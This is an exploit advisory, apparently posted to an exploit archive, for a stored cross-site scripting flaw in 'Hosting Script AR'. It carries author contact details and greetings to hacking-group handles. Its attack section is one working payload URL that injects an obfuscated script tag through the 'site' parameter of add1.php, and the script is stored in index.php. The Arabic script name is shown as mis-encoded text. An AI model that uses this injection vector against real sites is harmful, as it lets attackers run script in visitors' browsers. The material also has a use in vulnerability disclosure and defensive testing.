Hosting Script AR suffers from a cross site scripting vulnerability.
74fa1c0422d5bc054cbdc3fcfa4068a86bd5c9a4600e35302963be6697fd6605
========================================================================================
| # Title : Hosting Script AR Version Cross Site Scripting Vulnerability |
| # Author : indoushka |
| # email : indoushka@hotmail.com |
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
| # Web Site : www.iq-ty.com |
| # Script : ÓßÑÈÊ ÚãáÇÁ ÇáÇÓÊÖÇÝÉ åÏíÉ ãä ÃÎæßã :: ÚÇãÑ ÇáÕíÚÑí
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
| # Bug : XSS |
====================== Exploit By indoushka =================================
| # Exploit :
|
| 1- http://server/host/add1.php?site=indoushka@hotmail.com<ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>domain.com.
| Stored in file /host/index.php
================================ Dz-Ghost Team ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------